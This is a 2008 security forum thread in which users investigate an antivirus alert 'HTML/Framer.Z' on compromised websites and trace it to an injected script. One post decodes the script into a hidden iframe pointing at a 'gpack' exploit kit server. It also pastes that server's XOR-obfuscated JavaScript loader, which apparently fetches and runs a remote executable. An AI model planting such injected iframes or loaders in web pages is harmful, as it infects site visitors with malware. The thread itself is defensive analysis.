Re: Question about HTML/Framer.Z in Security

Re: Question about HTML/Framer.Z

Sun, 06 Apr 2008 13:08:09 EDT

foxsteve : If this is information from Piu Lo :)

nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539

....

>tracert 58.65.232.33

Tracing route to oracle.dmain.name [58.65.232.33]
over a maximum of 30 hops:
...............
8 126 ms 127 ms 127 ms po12- 0.cr2.nrt1.asianetcom.net [202.147.50.146]

9 183 ms 185 ms 183 ms gi6-2.cr1.hkg3.asianetcom.net [202.147.16.93]

10 190 ms 188 ms 190 ms po15-0.gw2.hkg3.asianetcom.net [202.147.16.210]

11 187 ms 186 ms 187 ms HFI-0002.gw2.hkg3.asianetcom.net [202.147.17.90]

12 187 ms 186 ms 187 ms 58.65.235.230

13 186 ms 187 ms 187 ms 116.50.12.10

14 182 ms 183 ms 184 ms oracle.dmain.name [58.65.232.33]

Re: Question about HTML/Framer.Z

Sun, 06 Apr 2008 11:35:18 EDT

bobince :

quote:
As you see that server is located in Hong-Kong and it is not Russia

True, that's where it's hosted, but the operators of the server are almost certainly members of Russian-language malware community and not residents of HK.

HostFresh is a black-hat provider of dedicated servers catering primarily to the Russians. It was previously housed alongside another major black-hat ISP, Esthost, in the Atrivo/Intercage Netblock of Hell.

Re: Question about HTML/Framer.Z

Sat, 05 Apr 2008 18:21:28 EDT

foxsteve : That sequence (%77%69%6e%64%6f%77%2e...) may be decoded as here

window.status='Done';document.write('<iframe name=a0a5a src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*43280)+'8b6\' width=541 height=80 style=\'display: none\'></iframe>')

Only one website was found with this IP 58.65.232.33, however this website was not related to any domain name.

Additional information.

This IP is allocated to APNIC (Asia Pacific Network Information Centre)
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

inetnum: 58.65.232.0 - 58.65.239.255
netname: HOSTFRESH
descr: Internet Service Provider
status: ALLOCATED PORTABLE
person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK

WEB site is active and here is a result of calling that URL http://58.65.232.33/gpack/index.php

Requesting http://58.65.232.33/gpack/index.php .. OkReply received (reply time: 484 ms)-----------------------------------HTTP/1.1 200 OKDate: Sat, 05 Apr 2008 22:36:58 GMTServer: Apache/2.2.6 (Fedora)X-Powered-By: PHP/5.1.6Content-Length: 942Connection: closeContent-Type: text/html <html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(:gtobuhno!ru`su)(!zw`s!fgg!<!enbtldou/bsd`udDmdldou)&nckdbu&(:fgg/rdu@uushctud)&he&-&fgg&(:fgg/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:usx!zw`s!p!<!fgg/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:w`s!r!<!fgg/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(:w`s!u!<!fgg/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:usx!z!u/uxqd!<!0:p/nqdo)&F&*#D#*&U&-&iuuq;..49/74/323/22.fq`bj.mn`e/qiq&-g`mrd(:p/rdoe)(:!u/nqdo)(:u/Vshud)p/sdrqnordCnex(:w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:u/R`wdUnGhmd)o`ld-3(:u/Bmnrd)(:|!b`ubi)d(!z|usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html>

PS. For bobince
As you see that server is located in Hong-Kong and it is not Russia. :)

Re: Question about HTML/Framer.Z

Sat, 05 Apr 2008 12:16:06 EDT

anon : AVG 7.5 free addition is alerting to HTML/Framer.Z on this site: www.pci-golf.com.

Re: Question about HTML/Framer.Z

Fri, 04 Apr 2008 10:47:23 EDT

bobince :

quote:
only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it

Not necessarily. AVs including Norton also trigger on encoded JavaScript snippets which end up document.write()ing redirections to exploits, regardless of whether the exploit at the end is actually reached. Occasionally this produces false positives with other encoded JavaScripts, but generally speaking obfuscated JavaScript is usually a sign that something dodgy is up.

Trying to come to a conclusion about whether a site is really hacked or not from the responses of popular AVs is a pointless task, as well as likely to get you infected. If you want to really know what's going on, you have to look at the code. It's not that hard and it's much more productive than arguing over which AV is the more canonical (tip: none of them are really that reliable).

So given the above post, we can guess the place to look is view-source:hxxp://tigerjimmytattoo.com/. Immediately obvious at the bottom of that is:

{script}eval(unescape("%77%69%6e%64%6f%77%2e...

Code like this is an immediate big red flag.

Anyhow, should we try unescape()ing this manually, we find it writes out an iframe tag pointing to a 'gpack' exploit kit at 58.65.232.33, a server at known Russian-related malware host HostFresh. Currently the URL leads only to a 404, so it's not quite true to say the site is infected *right now*, but it's definitely been hacked and there probably have been/will be exploits from there at other times.

Re: Question about HTML/Framer.Z

Thu, 03 Apr 2008 09:25:57 EDT

anon : I get the same virus notice from my AVG. I googled Tiger Jimmy tattoos. When at the site, i got the same message 3 times. AVG said it healed the virus. It did come up after running AVG.

Re: Question about HTML/Framer.Z

Mon, 31 Mar 2008 19:00:51 EDT

sashwa : Do not click the above link.

Re: Question about HTML/Framer.Z

Mon, 31 Mar 2008 16:55:57 EDT

anon : I have been on vacation and just found out that my site is starting to do this as well.

[link removed]

Re: Question about HTML/Framer.Z

Mon, 31 Mar 2008 12:01:29 EDT

Sarah : The page is gone now so there's nothing left to look at... he just tacked up a placeholder message saying it will be back up soon when he fixes it.

But that is good info re: Norton, I know my friend was using a recent version of Firefox so it's probably less likely to be vulnerable.
--
Killers and liars welcome

Re: Question about HTML/Framer.Z

Mon, 31 Mar 2008 11:59:24 EDT

zteardrop : FYI.. only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it. Its hard to say if its an FP without the URL. If you can PM me the URL I can take a look.

Re: Question about HTML/Framer.Z

Mon, 31 Mar 2008 09:22:31 EDT

Sarah : It was flagging the page with the forum list on it (basically its version of this page: »/forums/all) which is also the main page of the forum... so I don't think it could be anything that was posted by a user.

I should add, if it matters, the page looked like it had been altered since there were error messages in it and people could not log in...
--
Killers and liars welcome

Re: Question about HTML/Framer.Z

Mon, 31 Mar 2008 08:58:03 EDT

redwolfe_98 : i have seen times when "antivir" would flag some webpages just because someone had posted some "code" in one of the posts.. maybe avg is, similarly, flagging something like that?

Question about HTML/Framer.Z

Mon, 31 Mar 2008 08:34:49 EDT

Sarah : A website I frequent has been sending up flags that AVG has found "HTML/Framer.Z" upon loading the main web page. Talking to some other forum members (via e-mail since the forum is down now) it seems that everyone running AVG has seen this but someone running Norton finds nothing. No one seems to be seeing any kind of active infection; AVG is just flagging the cached pages from the infected site. After a full scan it did not find any other infected files.

I can find very little information about this particular problem and I'm wondering if anyone here can enlighten me? Should my friend with Norton be worried or is this something along the lines of a FP/overreaction with AVG? I'm thinking this may be a more common virus that AVG is just naming differently than everyone else but I don't know what exactly I need to be looking for. Google searches just reveal questions like mine ("I'm seeing this pop up, what should I do") and no real info about the virus in question.
--
Killers and liars welcome